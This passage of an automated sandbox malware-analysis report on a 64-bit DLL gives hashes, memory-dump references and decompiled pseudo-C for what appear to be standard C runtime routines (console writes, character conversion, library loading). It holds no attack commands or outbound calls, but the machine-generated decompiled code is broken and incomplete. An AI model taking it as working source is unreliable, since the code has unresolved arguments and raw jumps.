                                • String ID: uJ$uJ
                                • API String ID: 2332451156-3171342107
                                • Opcode ID: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction ID: 472db6e0f7e024575461c38261d4bf7162b67d150d80215de507f62be774332f
                                • Opcode Fuzzy Hash: 7d8230a046c4e347e58ee4c4be8fc8a96b4e0ab99a4e879f048771c8d09b0c9e
                                • Instruction Fuzzy Hash: ED81C5227047A0C7DB20DB66E8592EE7BAAF7C9B84F584421FF4E4774ACE39C4558704
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130ED47C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction ID: af41ad1a353df793f28d0ed632af6f6e6ff1c393578a34c4022ff524bf2c32b2
                                • Opcode Fuzzy Hash: c2f227e28329df5dc8db2b91678dcb263e506423369a0cae19a5505f40a1c87e
                                • Instruction Fuzzy Hash: 0AF0C862B19F5696FF449B15F48027963A0EF8C7A8F541435D90F22664DF3CD494D320
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F4AF8 Relevance: 7.7, APIs: 5, Instructions: 203COMMON
                                Download Yara Rule
                                C-Code - Quality: 46%
                                			E00007FFC7FFC130F4AF8(signed long long __ecx, void* __edx, void* __esi, void* __ebp, intOrPtr* __rax, long long __rbx, signed short* __rdx, void* __r9, long long _a32) {
				char _v64;
				signed long long _v72;
				intOrPtr _v84;
				unsigned int _v88;
				intOrPtr _v96;
				long long _v100;
				signed int _v104;
				signed int _v120;
				void* __rbp;
				void* _t75;
				long _t94;
				unsigned int _t95;
				intOrPtr _t103;
				signed int _t124;
				intOrPtr _t158;
				unsigned long long _t164;
				signed int* _t166;
				intOrPtr _t169;
				unsigned int _t182;
				signed short* _t183;
				void* _t185;
				signed long long _t194;
				void* _t195;
				signed long long _t197;
				signed long long _t198;
				signed long long _t200;
				void* _t201;
				signed short* _t202;

				_t192 = __r9;
				_t179 = __rdx;
				_t167 = __rbx;
				_a32 = __rbx;
				r15d = r8d;
				_t194 = __ecx;
				_t183 = __rdx;
				if (r8d != 0) goto 0x130f4b26;
				goto 0x130f4dc1;
				if (__rdx != 0) goto 0x130f4b4a;
				E00007FFC7FFC130EE680(__rax);
				 *__rax = 0;
				_t75 = E00007FFC7FFC130EE6A0(__rax);
				 *__rax = 0x16;
				E00007FFC7FFC130EE580(_t75);
				goto 0x130f4dc1;
				r14d = r14d & 0x0000003f;
				_t197 = _t194 >> 6;
				_t200 = _t194 << 6;
				_v72 = _t197;
				_t169 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
				_t103 =  *((intOrPtr*)(_t169 + _t200 + 0x39));
				if (__rbx - 1 - 1 > 0) goto 0x130f4b80;
				if (( !r15d & 0x00000001) == 0) goto 0x130f4b2b;
				if (( *(_t169 + _t200 + 0x38) & 0x00000020) == 0) goto 0x130f4b96;
				_t14 = _t179 + 2; // 0x2
				r8d = _t14;
				E00007FFC7FFC130F5D68(0x13124970, _t169, __rdx);
				_v88 = _t182;
				if (E00007FFC7FFC130F3EE4(r12d, 0, 0x13124970) == 0) goto 0x130f4cab;
				_t158 =  *((intOrPtr*)(0x13124970 + _t197 * 8));
				if (( *(0x13124970 + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4cab;
				E00007FFC7FFC130EF0D4(_t158, __rbx, _t169, _t179, __r9);
				if ( *((intOrPtr*)( *((intOrPtr*)(_t158 + 0x90)) + 0x138)) != _t182) goto 0x130f4bec;
				if ( *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t197 * 8)) + _t200 + 0x39)) == dil) goto 0x130f4cab;
				if (GetConsoleMode(??, ??) == 0) goto 0x130f4cab;
				if (_t103 == 0) goto 0x130f4c8d;
				if (_t103 - 1 - 1 > 0) goto 0x130f4d48;
				_v104 = _v104 & 0;
				_t195 = _t183 + _t201;
				_t202 = _t183;
				_v100 = 0;
				if (_t183 - _t195 >= 0) goto 0x130f4d3e;
				r13d =  *_t202 & 0x0000ffff;
				if (E00007FFC7FFC130F633C(r13w & 0xffffffff) != r13w) goto 0x130f4c7b;
				_v100 = 2;
				if (r13w != 0xa) goto 0x130f4c70;
				r13d = 0xd;
				if (E00007FFC7FFC130F633C(r13d) != r13w) goto 0x130f4c7b;
				_v100 = 2;
				if ( &(_t202[1]) - _t195 >= 0) goto 0x130f4c84;
				goto 0x130f4c35;
				_v104 = GetLastError();
				_t198 = _v72;
				goto 0x130f4d3e;
				r9d = r15d;
				E00007FFC7FFC130F446C(r12d, 1, __esi, _t167,  &_v104,  &_v64, _t183, _t192);
				asm("movsd xmm0, [eax]");
				_t124 =  *0x7FFC13124978;
				goto 0x130f4d43;
				if (( *( *((intOrPtr*)(0x13124970 + _t198 * 8)) + _t200 + 0x38) & 0x00000080) == 0) goto 0x130f4d0b;
				if (3 == 0) goto 0x130f4cf7;
				if (3 == 0) goto 0x130f4ce3;
				if (2 != 1) goto 0x130f4d48;
				r9d = r15d;
				E00007FFC7FFC130F477C(3, r12d, 0x13124970, _t167,  &_v104, _t185, _t183);
				goto 0x130f4c9f;
				r9d = r15d;
				E00007FFC7FFC130F4898(r12d, _t124, 0x13124970, _t167,  &_v104, _t185, _t183);
				goto 0x130f4c9f;
				r9d = r15d;
				E00007FFC7FFC130F4674(r12d, _t124, 0x13124970, _t167,  &_v104, _t185, _t183);
				goto 0x130f4c9f;
				_v104 = _v104 & _t124;
				_v120 = _v120 & 0x13124970;
				r8d = r15d;
				_v100 = 0x13124970;
				if (WriteFile(??, ??, ??, ??, ??) != 0) goto 0x130f4d3b;
				_t94 = GetLastError();
				_v104 = _t94;
				asm("movsd xmm0, [ebp-0x30]");
				asm("movsd [ebp-0x20], xmm0");
				_t164 = _v88 >> 0x20;
				if (_t94 != 0) goto 0x130f4dbc;
				_t95 = _v88;
				if (_t95 == 0) goto 0x130f4d88;
				if (_t95 != 5) goto 0x130f4d7b;
				E00007FFC7FFC130EE6A0(_t164);
				 *_t164 = 9;
				E00007FFC7FFC130EE680(_t164);
				 *_t164 = 5;
				goto 0x130f4b42;
				E00007FFC7FFC130EE630(_v88, _t164, _t167);
				goto 0x130f4b42;
				_t166 =  *((intOrPtr*)(0x13124970 + _t198 * 8));
				if (( *(0x13124970 + _t200 + 0x38) & 0x00000040) == 0) goto 0x130f4da4;
				if ( *_t183 == 0x1a) goto 0x130f4b1f;
				E00007FFC7FFC130EE6A0(_t166);
				 *0x13124970 = 0x1c;
				E00007FFC7FFC130EE680(_t166);
				 *_t166 =  *_t166 & 0x00000000;
				goto 0x130f4b42;
				return _v84 - _v96;
			}































                                0x7ffc130f4af8
                                0x7ffc130f4af8
                                0x7ffc130f4af8
                                0x7ffc130f4af8
                                0x7ffc130f4b11
                                0x7ffc130f4b14
                                0x7ffc130f4b17
                                0x7ffc130f4b1d
                                0x7ffc130f4b21
                                0x7ffc130f4b29
                                0x7ffc130f4b2b
                                0x7ffc130f4b30
                                0x7ffc130f4b32
                                0x7ffc130f4b37
                                0x7ffc130f4b3d
                                0x7ffc130f4b45
                                0x7ffc130f4b54
                                0x7ffc130f4b5b
                                0x7ffc130f4b5f
                                0x7ffc130f4b63
                                0x7ffc130f4b67
                                0x7ffc130f4b6b
                                0x7ffc130f4b75
                                0x7ffc130f4b7e
                                0x7ffc130f4b86
                                0x7ffc130f4b8d
                                0x7ffc130f4b8d
                                0x7ffc130f4b91
                                0x7ffc130f4b99
                                0x7ffc130f4ba4
                                0x7ffc130f4bb1
                                0x7ffc130f4bbb
                                0x7ffc130f4bc1
                                0x7ffc130f4bd4
                                0x7ffc130f4be6
                                0x7ffc130f4c08
                                0x7ffc130f4c10
                                0x7ffc130f4c17
                                0x7ffc130f4c1d
                                0x7ffc130f4c20
                                0x7ffc130f4c26
                                0x7ffc130f4c29
                                0x7ffc130f4c2f
                                0x7ffc130f4c35
                                0x7ffc130f4c46
                                0x7ffc130f4c4b
                                0x7ffc130f4c53
                                0x7ffc130f4c55
                                0x7ffc130f4c67
                                0x7ffc130f4c6b
                                0x7ffc130f4c77
                                0x7ffc130f4c79
                                0x7ffc130f4c81
                                0x7ffc130f4c84
                                0x7ffc130f4c88
                                0x7ffc130f4c8d
                                0x7ffc130f4c9a
                                0x7ffc130f4c9f
                                0x7ffc130f4ca3
                                0x7ffc130f4ca6
                                0x7ffc130f4cbc
                                0x7ffc130f4cc3
                                0x7ffc130f4cc8
                                0x7ffc130f4ccd
                                0x7ffc130f4ccf
                                0x7ffc130f4cdc
                                0x7ffc130f4ce1
                                0x7ffc130f4ce3
                                0x7ffc130f4cf0
                                0x7ffc130f4cf5
                                0x7ffc130f4cf7
                                0x7ffc130f4d04
                                0x7ffc130f4d09
                                0x7ffc130f4d14
                                0x7ffc130f4d19
                                0x7ffc130f4d1e
                                0x7ffc130f4d24
                                0x7ffc130f4d30
                                0x7ffc130f4d32
                                0x7ffc130f4d38
                                0x7ffc130f4d3e
                                0x7ffc130f4d43
                                0x7ffc130f4d4c
                                0x7ffc130f4d52
                                0x7ffc130f4d54
                                0x7ffc130f4d59
                                0x7ffc130f4d5e
                                0x7ffc130f4d60
                                0x7ffc130f4d65
                                0x7ffc130f4d6b
                                0x7ffc130f4d70
                                0x7ffc130f4d76
                                0x7ffc130f4d7e
                                0x7ffc130f4d83
                                0x7ffc130f4d8f
                                0x7ffc130f4d99
                                0x7ffc130f4d9e
                                0x7ffc130f4da4
                                0x7ffc130f4da9
                                0x7ffc130f4daf
                                0x7ffc130f4db4
                                0x7ffc130f4db7
                                0x7ffc130f4dd8

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 3215553584-0
                                • Opcode ID: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction ID: 8198741ddaf4f9c2ed38ab7a1c700d2cf715dc8ed07617c4b25deb922127e75a
                                • Opcode Fuzzy Hash: 1c690db1309c7a900eb2931eff8c1d9e19a22f9b812b3326b35846991b02b16e
                                • Instruction Fuzzy Hash: A481BF22B18E2A86FB509F6599406BD26E8BF44BACF424175CE0E337D5DF3CA461C720
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F446C Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON
                                Download Yara Rule
                                C-Code - Quality: 20%
                                			E00007FFC7FFC130F446C(signed int __edx, void* __edi, void* __esi, long long __rbx, signed long long __rcx, void* __rdx, long long __r8, void* __r9, long long _a8) {
				signed long long _v72;
				char _v80;
				intOrPtr _v87;
				char _v88;
				long long _v96;
				long long _v104;
				int _v108;
				intOrPtr _v112;
				short _v116;
				char _v120;
				signed long long _v128;
				signed long long _v136;
				intOrPtr _v144;
				signed int _v152;
				int _t80;
				long _t85;
				signed char _t86;
				signed long long _t116;
				intOrPtr _t120;
				long* _t125;
				signed long long _t127;
				intOrPtr _t136;
				signed long long _t140;
				void* _t143;
				signed long long _t146;
				void* _t148;
				void* _t156;
				void* _t157;
				signed long long _t161;

				_t127 = __rcx;
				_a8 = __rbx;
				_t116 =  *0x13123760; // 0x8abfd9f97faf
				_v72 = _t116 ^ _t148 - 0x00000080;
				r12d = r9d;
				_t161 = __edx >> 6;
				_t146 = __edx << 6;
				_v96 = __r8;
				_t125 = __rcx;
				_t157 = _t156 + __r8;
				_t120 =  *((intOrPtr*)( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x28));
				_v104 = 0x13124970;
				_v108 = GetConsoleCP();
				 *__rcx = __rdx;
				 *((intOrPtr*)(__rcx + 8)) = 0;
				if (__r8 - _t157 >= 0) goto 0x130f464a;
				r13b =  *((intOrPtr*)(__r8));
				_v120 = 0;
				_t136 =  *((intOrPtr*)(0x13124970 + _t161 * 8));
				_t86 =  *(_t136 + _t146 + 0x3d);
				if ((_t86 & 0x00000004) == 0) goto 0x130f451f;
				 *(_t136 + _t146 + 0x3d) = _t86 & 0x000000fb;
				r8d = 2;
				_v88 =  *((intOrPtr*)(_t136 + _t146 + 0x3e));
				_v87 = r13b;
				goto 0x130f4564;
				E00007FFC7FFC130F1740(_t86 & 0x000000fb, 0, _t120, __rcx, __rcx,  &_v88, __r9);
				if (( *(_t120 + _t127 * 2) & 0x00008000) == 0) goto 0x130f455b;
				if (__r8 - _t157 >= 0) goto 0x130f462a;
				r8d = 2;
				if (E00007FFC7FFC130F1654( &_v120, __r8) == 0xffffffff) goto 0x130f464a;
				_t143 = __r8 + 1;
				goto 0x130f4576;
				r8d = 1;
				if (E00007FFC7FFC130F1654( &_v120, _t143) == 0xffffffff) goto 0x130f464a;
				_v128 = _v128 & 0x00000000;
				_v136 = _v136 & 0x00000000;
				r9d = 1;
				_v144 = 5;
				_v152 =  &_v80;
				_t80 = WideCharToMultiByte(??, ??, ??, ??, ??, ??, ??, ??);
				r14d = _t80;
				if (_t80 == 0) goto 0x130f464a;
				_v152 = _v152 & 0x00000000;
				_t140 =  &_v80;
				r8d = _t80;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f4642;
				_t125[1] = _t125[2] - _v96 + __edi;
				if (_v112 - r14d < 0) goto 0x130f464a;
				if (r13b != 0xa) goto 0x130f4622;
				_t50 = _t140 + 0xd; // 0xd
				_v152 = _t140;
				_t52 = _t140 + 1; // 0x1
				r8d = _t52;
				_v116 = _t50;
				if (WriteFile(??, ??, ??, ??, ??) == 0) goto 0x130f4642;
				if (_v112 - 1 < 0) goto 0x130f464a;
				_t125[2] = _t125[2] + 1;
				_t125[1] = _t125[1] + 1;
				goto 0x130f44e0;
				 *((char*)( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3e)) =  *((intOrPtr*)(_t143 + 1));
				 *( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3d) =  *( *((intOrPtr*)(0x13124970 + _t161 * 8)) + _t146 + 0x3d) | 0x00000004;
				_t125[1] = _t125[1] + 1;
				goto 0x130f464a;
				_t85 = GetLastError();
				 *_t125 = _t85;
				E00007FFC7FFC130F6D80();
				return _t85;
			}
































                                0x7ffc130f446c
                                0x7ffc130f446c
                                0x7ffc130f4486
                                0x7ffc130f4490
                                0x7ffc130f44a1
                                0x7ffc130f44a4
                                0x7ffc130f44ab
                                0x7ffc130f44b2
                                0x7ffc130f44b6
                                0x7ffc130f44b9
                                0x7ffc130f44c0
                                0x7ffc130f44c5
                                0x7ffc130f44d1
                                0x7ffc130f44d4
                                0x7ffc130f44da
                                0x7ffc130f44e0
                                0x7ffc130f44e6
                                0x7ffc130f44f0
                                0x7ffc130f44f4
                                0x7ffc130f44f8
                                0x7ffc130f44ff
                                0x7ffc130f4508
                                0x7ffc130f450c
                                0x7ffc130f4516
                                0x7ffc130f4519
                                0x7ffc130f451d
                                0x7ffc130f451f
                                0x7ffc130f4530
                                0x7ffc130f4535
                                0x7ffc130f453b
                                0x7ffc130f4550
                                0x7ffc130f4556
                                0x7ffc130f4559
                                0x7ffc130f455b
                                0x7ffc130f4570
                                0x7ffc130f4576
                                0x7ffc130f4580
                                0x7ffc130f458d
                                0x7ffc130f4593
                                0x7ffc130f459d
                                0x7ffc130f45a5
                                0x7ffc130f45ab
                                0x7ffc130f45b0
                                0x7ffc130f45be
                                0x7ffc130f45c4
                                0x7ffc130f45c8
                                0x7ffc130f45d5
                                0x7ffc130f45df
                                0x7ffc130f45e6
                                0x7ffc130f45ec
                                0x7ffc130f45f2
                                0x7ffc130f45f5
                                0x7ffc130f45fa
                                0x7ffc130f45fa
                                0x7ffc130f4602
                                0x7ffc130f4614
                                0x7ffc130f461a
                                0x7ffc130f461c
                                0x7ffc130f461f
                                0x7ffc130f4625
                                0x7ffc130f4630
                                0x7ffc130f4638
                                0x7ffc130f463d
                                0x7ffc130f4640
                                0x7ffc130f4642
                                0x7ffc130f4648
                                0x7ffc130f4654
                                0x7ffc130f4673

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
                                • String ID:
                                • API String ID: 3659116390-0
                                • Opcode ID: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction ID: 9de9824038147a5cd8e5a518f35adca10164798dc89546b3ec1ab7c393af6ecd
                                • Opcode Fuzzy Hash: d55e4a3dc7fda081f8c103fa79b76e6ac1113be7caa21f5244fb0ba4ff43a9cd
                                • Instruction Fuzzy Hash: 7B51D232A18A658AFB10CF25E9443AD37B4FB48BACF148135CE0A67798DF38D165C710
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130EF320 Relevance: 7.6, APIs: 5, Instructions: 114libraryloaderCOMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 36%
                                			E00007FFC7FFC130EF320(void* __ecx, long long __rbx, void* __rdx, signed int __rsi, void* __r8, void* __r9) {
				signed long long _t72;
				signed long long _t76;
				intOrPtr _t78;
				signed long long _t80;
				signed long long _t89;
				struct HINSTANCE__* _t94;
				signed long long _t95;
				long long _t101;
				void* _t105;
				signed long long _t109;
				signed long long _t111;
				signed long long _t114;
				struct HINSTANCE__* _t115;
				long _t118;
				void* _t121;
				WCHAR* _t123;

				 *((long long*)(_t105 + 8)) = __rbx;
				 *((long long*)(_t105 + 0x10)) = _t101;
				 *((long long*)(_t105 + 0x18)) = __rsi;
				r14d = __ecx;
				_t111 =  *0x13123760; // 0x8abfd9f97faf
				_t95 = _t94 | 0xffffffff;
				_t89 = _t111 ^  *(0x7ffc130e0000 + 0x44810 + _t121 * 8);
				asm("dec eax");
				if (_t89 == _t95) goto 0x130ef4a1;
				if (_t89 == 0) goto 0x130ef389;
				_t72 = _t89;
				goto 0x130ef4a3;
				if (__r8 == __r9) goto 0x130ef435;
				_t78 =  *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + __rsi * 8));
				if (_t78 == 0) goto 0x130ef3a9;
				if (_t78 == _t95) goto 0x130ef421;
				goto 0x130ef41c;
				r8d = 0x800;
				LoadLibraryExW(_t123, _t121, _t118);
				if (_t72 != 0) goto 0x130ef3ea;
				if (GetLastError() != 0x57) goto 0x130ef3e8;
				r8d = 0;
				LoadLibraryExW(??, ??, ??);
				_t80 = _t72;
				goto 0x130ef3ea;
				if (_t80 != 0) goto 0x130ef403;
				 *((intOrPtr*)(0x7ffc130e0000 + 0x44770 + __rsi * 8)) = _t95;
				goto 0x130ef421;
				_t19 = 0x7ffc130e0000 + 0x44770 + __rsi * 8;
				_t76 =  *_t19;
				 *_t19 = _t80;
				if (_t76 == 0) goto 0x130ef41c;
				FreeLibrary(_t115);
				if (_t80 != 0) goto 0x130ef476;
				if (__r8 + 4 != __r9) goto 0x130ef392;
				if (_t80 == 0) goto 0x130ef486;
				GetProcAddress(_t94);
				if (_t76 == 0) goto 0x130ef47f;
				_t109 =  *0x13123760; // 0x8abfd9f97faf
				asm("dec eax");
				 *(0x7ffc130e0000 + 0x44810 + _t121 * 8) = _t76 ^ _t109;
				goto 0x130ef4a3;
				goto 0x130ef437;
				_t114 =  *0x13123760; // 0x8abfd9f97faf
				asm("dec eax");
				 *(0x7ffc130e0000 + 0x44810 + _t121 * 8) = _t95 ^ _t114;
				return 0;
			}



















                                0x7ffc130ef320
                                0x7ffc130ef325
                                0x7ffc130ef32a
                                0x7ffc130ef33c
                                0x7ffc130ef357
                                0x7ffc130ef35e
                                0x7ffc130ef368
                                0x7ffc130ef370
                                0x7ffc130ef376
                                0x7ffc130ef37f
                                0x7ffc130ef381
                                0x7ffc130ef384
                                0x7ffc130ef38c
                                0x7ffc130ef395
                                0x7ffc130ef3a0
                                0x7ffc130ef3a5
                                0x7ffc130ef3a7
                                0x7ffc130ef3b6
                                0x7ffc130ef3bc
                                0x7ffc130ef3c8
                                0x7ffc130ef3d3
                                0x7ffc130ef3d5
                                0x7ffc130ef3dd
                                0x7ffc130ef3e3
                                0x7ffc130ef3e6
                                0x7ffc130ef3f4
                                0x7ffc130ef3f9
                                0x7ffc130ef401
                                0x7ffc130ef406
                                0x7ffc130ef406
                                0x7ffc130ef406
                                0x7ffc130ef411
                                0x7ffc130ef416
                                0x7ffc130ef41f
                                0x7ffc130ef428
                                0x7ffc130ef43a
                                0x7ffc130ef442
                                0x7ffc130ef44b
                                0x7ffc130ef44d
                                0x7ffc130ef466
                                0x7ffc130ef46c
                                0x7ffc130ef474
                                0x7ffc130ef47d
                                0x7ffc130ef47f
                                0x7ffc130ef493
                                0x7ffc130ef499
                                0x7ffc130ef4bf

                                APIs
                                • GetProcAddress.KERNEL32(?,00008ABFD9F97FAF,00000004,00007FFC130EF647,?,?,00000000,00007FFC130EF1C7,?,?,00008ABFD9F97FAF,00007FFC130EE6A9), ref: 00007FFC130EF442
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: AddressProc
                                • String ID:
                                • API String ID: 190572456-0
                                • Opcode ID: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction ID: b3c1aa9b45117998430089d8621a0ccc55ad2349ced2e3cb28d30a168b23aa20
                                • Opcode Fuzzy Hash: 455019633da336f5729206dc12b9164558a1ea73cc9de17300a2dc75095f9908
                                • Instruction Fuzzy Hash: CE4128A2B0EE6981FE118B52A80027523D1BF04BF8F1A4939DD1D5B7C4EF3CE015C214
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F4EEC Relevance: 7.6, APIs: 5, Instructions: 72COMMON
                                Download Yara Rule
                                C-Code - Quality: 32%
                                			E00007FFC7FFC130F4EEC(void* __edx, long long __rax, long long __rbx, void* __rcx, long long* __rdx, long long __rsi, long long __rbp, long long _a8, long long _a16, long long _a24) {
				intOrPtr _v32;
				long long _v40;
				void* _t11;
				long long _t49;

				_a8 = __rbx;
				_a16 = __rbp;
				_a24 = __rsi;
				if (__rcx != 0) goto 0x130f4f28;
				_t11 = E00007FFC7FFC130EE6A0(__rax);
				 *((intOrPtr*)(__rax)) = 0x16;
				E00007FFC7FFC130EE580(_t11);
				goto 0x130f4fc9;
				if (__rdx == 0) goto 0x130f4f11;
				E00007FFC7FFC130EF4C0();
				_v32 = 0;
				r15d = 0;
				 *__rdx = _t49;
				r15b = 0 == 0;
				_v40 = _t49;
				r9d = r9d | 0xffffffff;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x130f4f6f;
				E00007FFC7FFC130EE630(GetLastError(), __rax, __rbx);
				goto 0x130f4f21;
				E00007FFC7FFC130EE154(__rax, _t14 + _t14);
				if (__rax == 0) goto 0x130f4fbf;
				_v32 = r14d;
				r9d = r9d | 0xffffffff;
				_v40 = __rax;
				if (MultiByteToWideChar(??, ??, ??, ??, ??, ??) != 0) goto 0x130f4fb1;
				E00007FFC7FFC130EE630(GetLastError(), __rax, __rax);
				goto 0x130f4fbf;
				 *__rdx = __rax;
				E00007FFC7FFC130EE114(__rax, _t49);
				return 1;
			}







                                0x7ffc130f4eec
                                0x7ffc130f4ef1
                                0x7ffc130f4ef6
                                0x7ffc130f4f0f
                                0x7ffc130f4f11
                                0x7ffc130f4f16
                                0x7ffc130f4f1c
                                0x7ffc130f4f23
                                0x7ffc130f4f2b
                                0x7ffc130f4f2d
                                0x7ffc130f4f34
                                0x7ffc130f4f38
                                0x7ffc130f4f3b
                                0x7ffc130f4f3e
                                0x7ffc130f4f42
                                0x7ffc130f4f4a
                                0x7ffc130f4f5e
                                0x7ffc130f4f68
                                0x7ffc130f4f6d
                                0x7ffc130f4f75
                                0x7ffc130f4f80
                                0x7ffc130f4f82
                                0x7ffc130f4f87
                                0x7ffc130f4f8e
                                0x7ffc130f4fa0
                                0x7ffc130f4faa
                                0x7ffc130f4faf
                                0x7ffc130f4fb7
                                0x7ffc130f4fc2
                                0x7ffc130f4fe1

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: ByteCharErrorLastMultiWide$AllocateHeap_invalid_parameter_noinfo
                                • String ID:
                                • API String ID: 1500607604-0
                                • Opcode ID: 68226cd7c6c8364906c3fc8632874d394513f4a7677611d84de0b260f5baa58c
                                • Instruction ID: bead81b311d4956a53ee90830fa4c9ec142b17a700b8c3690d425cc51ce643dc
                                • Opcode Fuzzy Hash: 68226cd7c6c8364906c3fc8632874d394513f4a7677611d84de0b260f5baa58c
                                • Instruction Fuzzy Hash: 5121B531B08F6A42FA149F66AD0013AA2D9AFC4BB8F150934ED5D637D5EE3CD464C220
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00007FFC130F6400 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                Download Yara Rule
                                C-Code - Quality: 85%
                                			E00007FFC7FFC130F6400(signed int __ecx, void* __edx, long long __rbx, void* __rdx, long long __rsi, long long _a8, long long _a16) {
				signed int _t27;
				signed int _t28;
				signed int _t29;
				signed int _t30;
				signed int _t31;
